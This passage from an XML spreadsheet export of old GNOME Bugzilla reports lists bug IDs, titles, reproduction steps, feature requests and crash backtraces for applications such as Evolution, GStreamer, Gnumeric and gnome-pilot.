    <t>Moving a message by drag-n-drop has ot the same behavior as Action/Move.
Drag-n-drop leaves the focus at the just moved (deleted) message whereas
Action/Move sets the focus to the ext message just like normal deletion.
Steps to reproduce the problem:
- disable View / Hide deleted Messages
- move a message using drag-n-drop
  =&gt; the mail is copied to the target folder and deleted
  =&gt; the focus stays at the just deleted mail (!)
- move a message using Action / Move
  =&gt; the mail is copied to the target folder and deleted
  =&gt; the focus is set to the next message (!)
Expected Results:
- the _same_ behavior of both ways to accomplish the _same_ task
Reproduceable: always
Due to the gtk+-2.2 bug I cannot test drag-n-drop with Evo 1.3.3. However
the Action/Move is the same and I assume drag-n-drop has the same behavior
 as 1.2.x.
Please make this methods consistent -- I am not too sure which one is the
best way but I tend to the Actions/Move behavior.</t>
  </si>
  <si>
    <t>EVOLUTION-200655</t>
  </si>
  <si>
    <t>SelectNames doesn't let you remove addresses after you add them</t>
  </si>
  <si>
    <t>GSTREAMER-339918</t>
  </si>
  <si>
    <t>GstTagSetter merge-mode description unclear and implementations inconsistent</t>
  </si>
  <si>
    <t>Currently the documentation on gst_tag_setter_set_tag_merge_mode() is missing a number of words and so makes it unclear what the merge mode should mean. This is particularly bad since different plugins make it mean different things.
    The default is GST_TAG_MERGE_KEEP which keeps the tags by this interface and discards tags from events.
Consider when a tag artist = Foo comes doen the pipeline as an event and another tag artist = Bar is set on the tag-setter interface. What do KEEP and REPLACE mean?
id3mux and the taglib id3 muxer currently make KEEP mean keep event tags and discard interface tags and REPLACE mean replace event tags with interface tags
vorbisenc flacenc and speexenc currently make it mean the opposite: KEEP=keep interface tags and discard event tags and REPLACE=replace interface tags with event tags.
The default mode is KEEP and so having that discard interface tags would mean that the default mode is to make the tag-setter interface do nothing. Having it use the tags you have it (by default) probably makes more sense.
Changing either of the groups interpretations could potentially break applications that rely on the broken behaviour. All released versions of Rhythmbox that support ID3 tag editing set the mode to REPLACE (because that's what worked with id3mux) and there may be apps that depend on vorbisenc et al's interpretation being correct. Leaving it as-is would require apps to special-case elements to set the right mode which would also be bad.</t>
  </si>
  <si>
    <t>LINC-70550</t>
  </si>
  <si>
    <t>NI_MAXHOST and NI_MAXSERV not defined on sparc-solaris</t>
  </si>
  <si>
    <t>I get a compiler error when trying to compile linc-0.1.16 on sparc-solaris2.7
using garnome-0.6.0
The error is about NI_MAXHOST and NI_MAXSERV not being defined.</t>
  </si>
  <si>
    <t>EVOLUTION-216521</t>
  </si>
  <si>
    <t>This email message crashes Evolution 1.0</t>
  </si>
  <si>
    <t>Package: Evolution
Priority: Major
Version: 1.0
Synopsis: This email message crashes Evolution 1.0
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Everytime I look at the following email message the Evolution email
component dies. Email addresses changed to protect the guilty.
From xxx@trilegiant.com Tue Dec  4 09:16 EST 2001
Received: from xxx.xxx.com (xxx.xxx.com [123.123.123.123])
	by godzilla.xxx.xxx.com (8.8.8+Sun/8.8.8) with ESMTP id JAA26486
	for  Tue 4 Dec 2001 09:16:25 -0500
(EST)
Received: by xxx.xxx.xxx.com with Internet Mail Service (5.5.2653.19)
	id  Tue 4 Dec 2001 09:16:24 -0500
Message-ID: 
From: xxx xxx M 
To: xx_xxxxx 
Cc: xxx_xxx 
        xxx Xxx
        Xxx xxx 
        xxx Xxx F 
Subject: Unable to checkout auto01 code
Date: Tue 4 Dec 2001 09:05:24 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/mixed
	boundary=----_=_NextPart_000_01C17CCC.B7D5CFA0
Content-Length: 284028
Status: RO
X-Status: $$$$
X-UID: 0000003450
This message is in MIME format. Since your mail reader does not
understand
this format some or all of this message may not be legible.
------_=_NextPart_000_01C17CCC.B7D5CFA0
Content-Type: text/plain
	charset=iso-8859-1
VSS is not allowing any developers to checkin our checkout code from
the
auto01 web on Dexterslab.  This just started occuring this morning. 
Please
investigate asap.  Sample error:
-xxx 
~~~~~~~~~~~~~~~~~~~~~~~~~~ 
Xxx Xxx 
Trilegiant 
xxx Software Development 
(123)123-1234 
~~~~~~~~~~~~~~~~~~~~~~~~~~ 
----------------------- 
The information in this electronic mail message is Trilegiant
Confidential
and may be legally privileged. It is intended solely for the
addressee(s).
Access to this Internet electronic mail message by anyone else is
unauthorized. If you are not the intended recipient any disclosure
copying distribution or action taken or omitted to be taken in reliance
on
it is prohibited and may be unlawful.
------------------------- 
The sender believes that this E-mail and any attachments were free of
any
virus worm Trojan horse and/or malicious code when sent. This message
and
its attachments could have been infected during transmission. By reading
the
message and opening any attachments the recipient accepts full
responsibility for taking protective and remedial action about viruses
and
other defects. Trilegiant Corporation is not liable for any loss or
damage
arising in any way from this message or its attachments.
------------------------- 
------_=_NextPart_000_01C17CCC.B7D5CFA0
Content-Type: image/gif
	name=Image13.gif
Content-Transfer-Encoding: base64
Content-Disposition: attachment
	filename=Image13.gif
Content-ID: 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</t>
  </si>
  <si>
    <t>shooton</t>
  </si>
  <si>
    <t>GEDIT-352428</t>
  </si>
  <si>
    <t>Plugins documentation (more specific snippets)</t>
  </si>
  <si>
    <t>Here are a few comments on the current documentation of the plugins:
- The table at the top of the page should be updated to include the latest list of snippets distributed with gedit.
- Maybe link the items in the table to their corresponding descriptions lower on the page
Some pointers on the snippets documentation:
- I think it should be explained that the 'n' in ${n} is actually a number and that the number defines the order in which the placeholders are visited when pressing tab (or shift tab)
- It might be worth mentioning that +Tab moves the cursor to the previous placeholder instead of the next
- Instead of ${n} just use $n (which is the simplest way to define a placeholder)
- There is a small typo in the mirror placeholders section:
Mirror placeholders
    A repeated _a_ tab placeholder
- The somewhat special $GEDIT_CURRENT_WORD environmental variable should also be mentioned (see l.g.o. for more information on that env var)
- A small typo in the basename env var description:
The full filename of the document or _and_ empty string if the document isn't saved yet.
- In the tab placeholders section:
Pressing Tab when there are no more tab placeholders moves the insertion cursor to the end of the snippet text.
-&gt; This is only true if no end placeholder has been defined manually. An example
could be a for snippet:
for (${1:i = 0} ${2:i &lt; n} {$3:++i}) {
    $0
}
Besides these rather small pointers great work!</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-88775</t>
  </si>
  <si>
    <t>modality problem on info/message box</t>
  </si>
  <si>
    <t>Tested gnome-control-center with 15th july build on sparc solaris on 
sunray box 
found some modality problem on it.
steps to reproduce:
1. start gnome-control-center.
2. goto -&gt; desktop preferences -&gt; advanced -&gt; File types and programs
3. click on  add sevices or edit button. u will get add service dialog.
4. now click on any other window.
5. the add service dialog goes behind the current window cliked.
6. hence all other button click events are disabled.
the add service dialog should be made as modal.</t>
  </si>
  <si>
    <t>GNUMERIC-130582</t>
  </si>
  <si>
    <t>automatic scrolling of lower pane when using arrows when entering a formula</t>
  </si>
  <si>
    <t>Steps to reproduce the bug:
- open a new sheet
- go to e.g. A10 and freeze panes
- scroll down so that A10 is no longer visible in lower pane
- go to A1 and enter 1
- go to B1 and enter =-
- use the left arrow to select A1
=&gt; the lower pane has automatically scrolled.
This behaviour is not very convenient and does not exist in XL.</t>
  </si>
  <si>
    <t>GNUMERIC-402508</t>
  </si>
  <si>
    <t>[Win32] Problem with filenames while saving</t>
  </si>
  <si>
    <t>I have problems here when I save a file under Gnumeric. It changes the filename to its correspondent in old DOS format that is 8+3 filename format (8 for the name a period and 3 for extension). This problem also ocurred in 1.6.3 version.</t>
  </si>
  <si>
    <t>lymber</t>
  </si>
  <si>
    <t>GTK+-165034</t>
  </si>
  <si>
    <t>Scrolling when fixed_height_mode is enabled is weird</t>
  </si>
  <si>
    <t>Scrolling down a fixed_height_mode treeview with the keyboard does odd things:
instead of scrolling so that the next row is fully visible it does not scroll
unless the row is not visible at all. But then when it scrolls it scrolls so
that the newly visible row is at the top of the view which is very strange
behaviour.</t>
  </si>
  <si>
    <t>BANSHEE-574882</t>
  </si>
  <si>
    <t>The volume slider should respond in real time</t>
  </si>
  <si>
    <t>Please describe the problem:
Just as like the Gnome volume slider Banshee's one should modify the volume on real time (it doesn't do it for me it changes like 3seconds after I move it).
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>EVOLUTION-201828</t>
  </si>
  <si>
    <t>attachment pop-up menu is flaky</t>
  </si>
  <si>
    <t>Sometimes when I pop up the attachment pop-up menu I have a hard time
selecting one of the options from it. Some sort of mis-grab or something?</t>
  </si>
  <si>
    <t>GNOME-CORE-28347</t>
  </si>
  <si>
    <t>Startup of GnomeICU</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.2.1
Synopsis: Startup of GnomeICU
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.17 i686 unknown
C library: glibc-2.1.94-3
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.10
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.2.1
Description:
After staring Gnome ICQ  0.94.1
-------------------------------------
Gtk-CRITICAL **: file gtklabel.c: line 260 (gtk_label_set_text):
assertion `GTK_IS_LABEL (label)' failed.
Gtk-WARNING **: invalid cast from `GtkPixmap' to `AppletWidget'
** CRITICAL **: file applet-widget.c: line 1272
(applet_widget_set_tooltip): assertion `IS_APPLET_WIDGET(applet)'
failed.
Gtk-WARNING **: invalid unclassed pointer in cast to `GtkPixmap'
Gtk-CRITICAL **: file gtkpixmap.c: line 125 (gtk_pixmap_set): assertion
`GTK_IS_PIXMAP (pixmap)' failed.
Gtk-WARNING **: invalid unclassed pointer in cast to `GtkLabel'
Gtk-CRITICAL **: file gtklabel.c: line 260 (gtk_label_set_text):
assertion `GTK_IS_LABEL (label)' failed.
Gtk-WARNING **: invalid cast from `GtkPixmap' to `AppletWidget'
** CRITICAL **: file applet-widget.c: line 1272
(applet_widget_set_tooltip): assertion `IS_APPLET_WIDGET(applet)'
failed.
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x40614099 in __wait4 () from /lib/libc.so.6
#0  0x40614099 in __wait4 () from /lib/libc.so.6
#1  0x4067d3e4 in __DTOR_END__ () from /lib/libc.so.6
#2  0x401708e8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x40069b31 in ORBit_activate_profile () from /usr/lib/libORBit.so.0
#5  0x400ae58c in g_slist_foreach () from /usr/lib/libglib-1.2.so.0
#6  0x40069c11 in _ORBit_object_get_connection () from /usr/lib/libORBit.so.0
#7  0x4002feab in GNOME_Applet_set_tooltips_state ()
   from /usr/lib/libpanel_applet.so.0
#8  0x8078cf6 in load_queued_externs ()
#9  0x400315f3 in _ORBIT_skel_GNOME_PanelSpot_register_us ()
   from /usr/lib/libpanel_applet.so.0
#10 0x40067dd7 in ORBit_POA_handle_request () from /usr/lib/libORBit.so.0
#11 0x4006a1a7 in ORBit_handle_incoming_request () from /usr/lib/libORBit.so.0
#12 0x4006a3e9 in ORBit_handle_incoming_message () from /usr/lib/libORBit.so.0
#13 0x40088509 in giop_main_handle_connection () from /usr/lib/libIIOP.so.0
#14 0x400fb7f9 in orb_handle_connection () from /usr/lib/libgnorba.so.27
#15 0x400a31a0 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#16 0x400a4987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#17 0x400a5001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#18 0x400a51cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#19 0x402bbf87 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#20 0x8056012 in main ()
#21 0x40577e21 in __libc_start_main (main=0x8055d00  argc=3 
    ubp_av=0xbffff7e4 init=0x8053310  fini=0x809356c  
    rtld_fini=0x4000df94  stack_end=0xbffff7dc)
    at ../sysdeps/generic/libc-start.c:111
#0  0x40614099 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4067d3e4 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x401708e8 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x40069b31 in ORBit_activate_profile () from /usr/lib/libORBit.so.0
No symbol table info available.
#5  0x400ae58c in g_slist_foreach () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#6  0x40069c11 in _ORBit_object_get_connection () from /usr/lib/libORBit.so.0
No symbol table info available.
#7  0x4002feab in GNOME_Applet_set_tooltips_state ()
   from /usr/lib/libpanel_applet.so.0
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 13:15 -------
This bug was previously known as bug 28347 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=28347
Originally filed under the gnome-core product and panel component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (karl.h@engineer.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>karl.h</t>
  </si>
  <si>
    <t>GNOME-UTILS-162114</t>
  </si>
  <si>
    <t>Small HIG fix.</t>
  </si>
  <si>
    <t>The view menu contains the menu item View Spellings.  The word view is
redundant.</t>
  </si>
  <si>
    <t>GSTREAMER-155242</t>
  </si>
  <si>
    <t>[threads/opt] deadlocks with spider ! alsasink playing a shn file</t>
  </si>
  <si>
    <t>With shndec from HEAD cvs gstreamer-0.8.7 &amp; gst-plugins-0.8.5 the following
command fails to play :
$ gst-launch-0.8 filesrc location=.shn ! spider ! alsasink
RUNNING pipeline ...
** (process:23434): WARNING **: deadlock detected disabling group 0x821ff50
Execution ended after 2 iterations (sum 224348000 ns average 112174000 ns min
228000 ns max 224120000 ns).
This is with the default (opt) scheduler using basicgthread as scheduler or
using osssink with the opt scheduler this pipeline works just dandy.
This affects using shndec for say rhythmbox (this is not yet supported) because
it uses spider.</t>
  </si>
  <si>
    <t>TOTEM-PL-PARSER-337411</t>
  </si>
  <si>
    <t>parsing issue due to gnome_vfs_mime_type_from_name () gnome_vfs_get_mime_type () works fine</t>
  </si>
  <si>
    <t>As figured on IRC while working on https://launchpad.net/distros/ubuntu/+source/totem/+bug/38169 libtotem-plparser has some issue with http://repubblicaradio.repubblica.it/asx/search.php?player_id=2454
totem_pl_parser_parse_internal() returns TOTEM_PL_PARSER_RESULT_UNHANDLE because mimetype == application/octet-stream from gnome_vfs_mime_type_from_name ()
gnome_vfs_get_mime_type () works correctly and mimetype == 'video/x-ms-asf' when using it
totem 1.4.0
gnome-vfs 2.14.0
shared-mime-info 0.17 with some fixes from the CVS but it does the same with a non patched version</t>
  </si>
  <si>
    <t>GAL-241056</t>
  </si>
  <si>
    <t>Define Views spacing/padding</t>
  </si>
  <si>
    <t>Please see http://bugzilla.gnome.org/show_bug.cgi?id=241001 for a complete
list of the hig spacing/padding requirements for gnome2 apps. The gist of
this is that the Define Views dialog needs some additional spacing and
padding namely: 
1. The padding between the contents of the dialog and the window border
should be 12 px.
2. The spacing between the ok/cancel buttons should be 12 px. 
3. The spacing between the various widgets in the dialog should be 6px.
packed.)</t>
  </si>
  <si>
    <t>GLIB-69646</t>
  </si>
  <si>
    <t>gmarkup error messages</t>
  </si>
  <si>
    <t>Setting the text of a use_markup label to x&lt;markup yields:
testgtk (pid:11480): Gtk-WARNING **: Failed to set label from markup due to error parsing markup: Error on line 1 char 26: ''       
but there is no '&lt;' !!!
setting the text to x&lt;/marku yields
testgtk (pid:11518): Gtk-WARNING **: Failed to set label from markup due to error parsing markup: Error on line 1 char 25: Element 'marku' was closed but the currently open element is 'markup'              
when I would have expected an error message about an unclosed endtag.</t>
  </si>
  <si>
    <t>GNOME-PILOT-340152</t>
  </si>
  <si>
    <t>gpilotd crashes while syncing avantgo conduit</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 4 (Stentz)
Package: gnome-pilot
Severity: normal
Version: GNOME2.10.0 unspecified
Gnome-Distributor: Red Hat Inc
Synopsis: gpilotd crashes while syncing avantgo conduit
Bugzilla-Product: gnome-pilot
Bugzilla-Component: gpilotd
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.10.0)
Description:
Description of the crash:
gpilotd crashes each time the avant go condiut is synchronized. Not sure
if this is a gpilotd problem or a conduit issue.
Steps to reproduce the crash:
1.  Make sure gpilotd is running
2. Hotsync
3. Wait for crash dialog to appear when AvantGo conduit is being
syncrhonized
Expected Results:
The usual successful syncrhonization
How often does this happen?
Each time I hotsync. Has not always been an issue in the past so perhaps
this is some new problem or perhaps it might be related to the pages
the AvantGo conduit is fetching. Not entirely sure.
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/libexec/gpilotd'
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.
(no debugging symbols found)
`shared object read from target memory' has disappeared keeping its
symbols.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1208301888 (LWP 25063)]
[New Thread -1221104720 (LWP 25137)]
[New Thread -1210614864 (LWP 25136)]
(no debugging symbols found)
0x00dcc402 in __kernel_vsyscall ()
#0  0x00dcc402 in __kernel_vsyscall ()
#1  0x0012ffbb in __waitpid_nocancel () from /lib/libpthread.so.0
#2  0x00470080 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#3  
#4  0x00a7d260 in gnome_pilot_conduit_send_message ()
   from /usr/lib/libgpilotdconduit.so.2
#5  0x016cf7c4 in cmdTASK ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
#6  0x016df31b in AGCPTask ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
#7  0x016dfea1 in AGCPPerformCommand ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
#8  0x016e08d3 in AGClientProcessorPing ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
#9  0x016e1531 in AGClientProcessorProcess ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
#10 0x016dd6a9 in doClientProcessorLoop ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
#11 0x016cf9c0 in cmdITEM ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
#12 0x00a7e5ab in gnome_pilot_conduit_backup_restore ()
   from /usr/lib/libgpilotdconduit.so.2
#13 0x00787285 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#14 0x0079575b in g_signal_stop_emission () from
/usr/lib/libgobject-2.0.so.0
#15 0x00796601 in g_signal_emitv () from /usr/lib/libgobject-2.0.so.0
#16 0x00a7f5b6 in gnome_pilot_conduit_standard_synchronize ()
   from /usr/lib/libgpilotdconduit.so.2
#17 0x080500e5 in gpilot_add_log_entry ()
#18 0x080509cd in gpilot_add_log_entry ()
#19 0x08050c02 in gpilot_sync_default ()
#20 0x0804d958 in device_equal_by_io ()
#21 0x0804e35d in network_device_err ()
#22 0x0065dfe6 in g_main_context_wakeup () from
/usr/lib/libglib-2.0.so.0
#23 0x0065c4ce in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#24 0x0065f4d6 in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
#25 0x0065f9b8 in g_main_context_iteration () from
/usr/lib/libglib-2.0.so.0
#26 0x0804ed4b in main ()
Thread 3 (Thread -1210614864 (LWP 25136)):
#0  0x00dcc402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x0087ba5c in poll () from /lib/libc.so.6
No symbol table info available.
#2  0x0065f328 in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x0065f7c3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x00d991ea in e_book_set_default_source () from
/usr/lib/libebook-1.2.so.3
No symbol table info available.
#5  0x0012ab80 in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#6  0x008859ce in clone () from /lib/libc.so.6
No symbol table info available.
Thread 2 (Thread -1221104720 (LWP 25137)):
#0  0x00dcc402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x0087ba5c in poll () from /lib/libc.so.6
No symbol table info available.
#2  0x0065f328 in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x0065f7c3 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x005923de in link_thread_io_context () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#5  0x00677ffa in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x0012ab80 in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#7  0x008859ce in clone () from /lib/libc.so.6
No symbol table info available.
Thread 1 (Thread -1208301888 (LWP 25063)):
#0  0x00dcc402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x0012ffbb in __waitpid_nocancel () from /lib/libpthread.so.0
No symbol table info available.
#2  0x00470080 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0x00a7d260 in gnome_pilot_conduit_send_message ()
   from /usr/lib/libgpilotdconduit.so.2
No symbol table info available.
#5  0x016cf7c4 in cmdTASK ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
No symbol table info available.
#6  0x016df31b in AGCPTask ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
No symbol table info available.
#7  0x016dfea1 in AGCPPerformCommand ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
No symbol table info available.
#8  0x016e08d3 in AGClientProcessorPing ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
No symbol table info available.
#9  0x016e1531 in AGClientProcessorProcess ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
No symbol table info available.
#10 0x016dd6a9 in doClientProcessorLoop ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
No symbol table info available.
#11 0x016cf9c0 in cmdITEM ()
   from /usr/lib/gnome-pilot/conduits/libmal_conduit.so
No symbol table info available.
#12 0x00a7e5ab in gnome_pilot_conduit_backup_restore ()
   from /usr/lib/libgpilotdconduit.so.2
No symbol table info available.
#13 0x00787285 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x0079575b in g_signal_stop_emission () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x00796601 in g_signal_emitv () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x00a7f5b6 in gnome_pilot_conduit_standard_synchronize ()
   from /usr/lib/libgpilotdconduit.so.2
No symbol table info available.
#17 0x080500e5 in gpilot_add_log_entry ()
No symbol table info available.
#18 0x080509cd in gpilot_add_log_entry ()
No symbol table info available.
#19 0x08050c02 in gpilot_sync_default ()
No symbol table info available.
#20 0x0804d958 in device_equal_by_io ()
No symbol table info available.
#21 0x0804e35d in network_device_err ()
No symbol table info available.
#22 0x0065dfe6 in g_main_context_wakeup () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#23 0x0065c4ce in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#24 0x0065f4d6 in g_main_context_check () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#25 0x0065f9b8 in g_main_context_iteration () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#26 0x0804ed4b in main ()
No symbol table info available.
------- Bug created by bug-buddy at 2006-04-29 21:44 -------
</t>
  </si>
  <si>
    <t>dstuartspam</t>
  </si>
  <si>
    <t>GNOME-MEDIA-140344</t>
  </si>
  <si>
    <t>should use gnome-common for the build system</t>
  </si>
  <si>
    <t>gnome-media's autogen.sh script requires automake-1.7 and doesn't even allow
newer versions.
This should be fixed so that automake 1.8 or better can be used to build
gnome-media.</t>
  </si>
  <si>
    <t>ATK-125212</t>
  </si>
  <si>
    <t>Inconsistency in property change event names</t>
  </si>
  <si>
    <t>In some cases property change event names contain _ instead of -.</t>
  </si>
  <si>
    <t>NAUTILUS-682371</t>
  </si>
  <si>
    <t>Don't show Open With tab for network:/// items</t>
  </si>
  <si>
    <t>Created attachment 222038
screenshot
Don't show Open With tab for network:/// items. They don't make any sense.</t>
  </si>
  <si>
    <t>GNOME-THEMES-112586</t>
  </si>
  <si>
    <t>need gtk-engine for HC themes</t>
  </si>
  <si>
    <t>We need a special gtk-engine in order to reasonably support the HC themes
for instance the bevels tend to get lost (either dark or light bevel blends
into background) and for the 'inverse' themes we pretty much lose the
shadow lines around components.
Also the checkboxes etc. could be made more highly visible for these themes.</t>
  </si>
  <si>
    <t>GLIB-343750</t>
  </si>
  <si>
    <t>g_object_set_data_full docs should state that destroy notify is ignored for NULL data</t>
  </si>
  <si>
    <t>g_object_set_data_full ignores the passed-in destroy notify if the data parameter is NULL but the docs don't state that.
Maybe the destroy parameter docs should be:
@destroy: function to call when the association is destroyed. Ignored if @data is %NULL.</t>
  </si>
  <si>
    <t>BEAGLE-172968</t>
  </si>
  <si>
    <t>Beagle logo is not a beagle</t>
  </si>
  <si>
    <t>Look at the beagle logo... Its not a beagle
I will post a updated logo in svg format that is a beagle. No problem if you
guys don't want to use it.</t>
  </si>
  <si>
    <t>NAUTILUS-73077</t>
  </si>
  <si>
    <t>nautilus release notes needs to be updated and/or removed from the help menu</t>
  </si>
  <si>
    <t>The release notes in help/nautilus-release-notes need to be updated for
GNOME2 or removed from the build. I'd recomend removing the link to them in
the help menu - I don't think it serves much purpose.</t>
  </si>
  <si>
    <t>RHYTHMBOX-125177</t>
  </si>
  <si>
    <t>option for disabling library update?</t>
  </si>
  <si>
    <t>It would be nice if there was an option to not scan the hard drive every
time rhythmbox starts. This tends to take a long time on a resonable amount
of oggs (~7GB) and on a laptop hard drive. This could either be implimented
as a gconf key or in the preferences I'm not real picky.</t>
  </si>
  <si>
    <t>PAN-84857</t>
  </si>
  <si>
    <t>SEGFAULT in Pan</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Pan
Severity: normal
Version: 0.11.3
Synopsis: SEGFAULT in Pan
Bugzilla-Product: Pan
Bugzilla-Component: general
Description:
Pan hung when I tried to fetch the new articles for a group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0x4054b239 in wait4 () from /lib/libc.so.6
#0  0x4054b239 in wait4 () from /lib/libc.so.6
#1  0x405c5e58 in __check_rhosts_file () from /lib/libc.so.6
#2  0x4049e7b2 in waitpid () from /lib/libpthread.so.0
#3  0x400908da in gnome_init () from /usr/lib/libgnomeui.so.32
#4  0x4049c144 in pthread_kill () from /lib/libpthread.so.0
#5  0x404d2288 in sigaction () from /lib/libc.so.6
#6  0x403f48e1 in g_str_equal () from /usr/lib/libglib-1.2.so.0
#7  0x403e6b9b in g_hash_table_lookup () from /usr/lib/libglib-1.2.so.0
#8  0x08067154 in articlelist_get_group ()
#9  0x080676df in articlelist_get_group ()
#10 0x08077025 in pan_widget_set_font ()
#11 0x0809b2ce in pan_error_dialog ()
#12 0x403eb17a in g_timeout_dispatch () from /usr/lib/libglib-1.2.so.0
#13 0x403ea258 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#14 0x403ea863 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#15 0x403ea9fc in g_main_run () from /usr/lib/libglib-1.2.so.0
#16 0x401cf707 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#17 0x080817d0 in main ()
#18 0x404c117d in __libc_start_main () from /lib/libc.so.6
#0  0x4054b239 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x405c5e58 in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x4049e7b2 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x400908da in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x4049c144 in pthread_kill () from /lib/libpthread.so.0
No symbol table info available.
#5  0x404d2288 in sigaction () from /lib/libc.so.6
No symbol table info available.
#6  0x403f48e1 in g_str_equal () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#7  0x403e6b9b in g_hash_table_lookup () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-06-11 09:53 -------
The original reporter (gnufnork@hetdigitalegat.nl) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component charles@rebelbase.com.
</t>
  </si>
  <si>
    <t>gnufnork</t>
  </si>
  <si>
    <t>GSTREAMER-316205</t>
  </si>
  <si>
    <t>Debug category for wavenc is not defined</t>
  </si>
  <si>
    <t>I was not able to find the definition for debug category wavenc_debug. 
It is declared trough GST_DEBUG_CATEGORY_EXTERN (wavenc_debug) in
gst/wavenc/gstwavenc.c but I can not find GST_DEBUG_CATEGORY_INIT (wavenc_debug)
anywhere.
This causes an error while compiling by MinGW/GCC on Windows.</t>
  </si>
  <si>
    <t>GARNOME-350908</t>
  </si>
  <si>
    <t>notification-daemon missing dependencies</t>
  </si>
  <si>
    <t>Please describe the problem:
desktop/notification-daemon is missing dependencies. It requires freedesktop/dbus-glib desktop/libwnck and platform/GConf
Steps to reproduce:
Having nothing but the bootstrap libs installed
cd desktop/notification-daemon &amp;&amp; make install
Actual results:
Installation fails because of missing dependencies.
Expected results:
I expect garnome to also build these dependencies.
Does this happen every time?
Yes.
Other information:
I missed these dependencies at first because of other Gnome/Garnome installations on my system. When doing some smoketesting I came across this.</t>
  </si>
  <si>
    <t>lorien420</t>
  </si>
  <si>
    <t>GNOME-SCAN-493853</t>
  </si>
  <si>
    <t>flegita</t>
  </si>
  <si>
    <t>compression can not be set to zero</t>
  </si>
  <si>
    <t>Please describe the problem:
Version: 0.5.3+r455-0ubuntu1~ppa1 (gutsy)
